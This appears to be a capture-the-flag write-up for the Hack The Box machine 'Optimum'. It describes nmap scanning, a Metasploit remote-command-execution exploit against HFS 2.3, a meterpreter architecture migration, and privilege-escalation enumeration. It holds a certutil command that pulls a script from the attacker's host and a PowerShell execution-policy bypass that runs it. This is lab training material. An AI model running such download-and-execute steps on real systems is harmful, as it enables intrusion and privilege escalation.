Optimum

Nmap Scanning

$ nmap -A -T4 -p- 10.10.10.8 -Pn

We only have one port open. Let's head over to our browser and check what website is running.

Looks like a file server. There is even a link to access the login page. Let's click on it.

Further googling reveals that there are no default credentials for HTTP File Server (HFS). Let's try a different route.

Using Metasploit

Initial Foothold

From our nmap scan, we know the HFS is version 2.3. Let's search for any publicly available exploits.

We find several.Let's first focus on the Remote Command Execution vulnerabilities. I can see there's a metasploit exploit so I'll check that one out first.

After configuring the options, I run the exploit.

Success! I get a meterpreter shell and go on to retrieve the user flag.

We also receive further information regarding the box. For instance, it's architecture is x64, and it's running Windows 2012 R2 (6.3 Build 9600).

Our meterpreter shell is x86/windows. It's important to change it to be the same type as our machine. To do that, use the background command to background our current session. Then use the post/windows/manage/archmigrate module which checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible, it spawns a new process with the correct architecture and migrates into that process. Finish setting up the options then run it.

Once it has successfuly run, exit out of the module using the back command. Then run our initial session using session -i 1. This will change our meterpreter session to be x64.

Let's use the getuid command to find out who we are on the machine.

Since we are not authority\system, we will need to escalate our privileges.

Privesc with Metasploit

The getsystem command also doesn't work for us.

Let's background our session and use suggester.

Type info to find out more details about it.

Let's run it.

We get a few hits that our machine could be vulnerable to some exploits. Before we go ahead in finding out more about them and see if they can help us privesc, let's do some further enumeration.

We know that the machine's OS is Windows 2012 R2 (6.3 build 9600). Let's google for exploits against it.

We find a promising link.

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)Exploit Database

Let's background our session and search for MS16-032 and then run it after configuring our options.

Unfortunately, it didn't work.

Privesc Without Metasploit

There's a useful tool called Sherlock that we can use to find local privesc vulnerabilities.

GitHub - rasta-mouse/Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.GitHub

Go ahead and copy the file and rename it to sher.ps1 and save it on your Desktop.

Let's go back to or meterpreter session and open up a shell.

We now need to transfer the file from our machine to the target. Go ahead and open up a simple python serveron your attack machine.

Now let's go back to our victim machine and use certutil to download the file from our attack machine.

certutil -urlcache -f http://10.10.14.10:9005/sher.ps1 sher.ps1

Now let's execute the file.

powershell.exe -exec bypass -Command "& {IMport-Module .\sher.ps1; FInd-AllVulns}"

We get feedback on which vulnerabilities exist on the machine.

We already tried exploiting MS16-032 using msfconsole but unfortunately, it failed. We could try exploiting it manually but it's a little too out of scope for this machine. It involves a lot of powershell modification. We are also going to ignore the others for now. But this is a useful tool and we will remember it for the future.

Open up google and search for windows exploit suggester.

GitHub - strozfriedberg/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.GitHub

Let's clone it to our opt directory.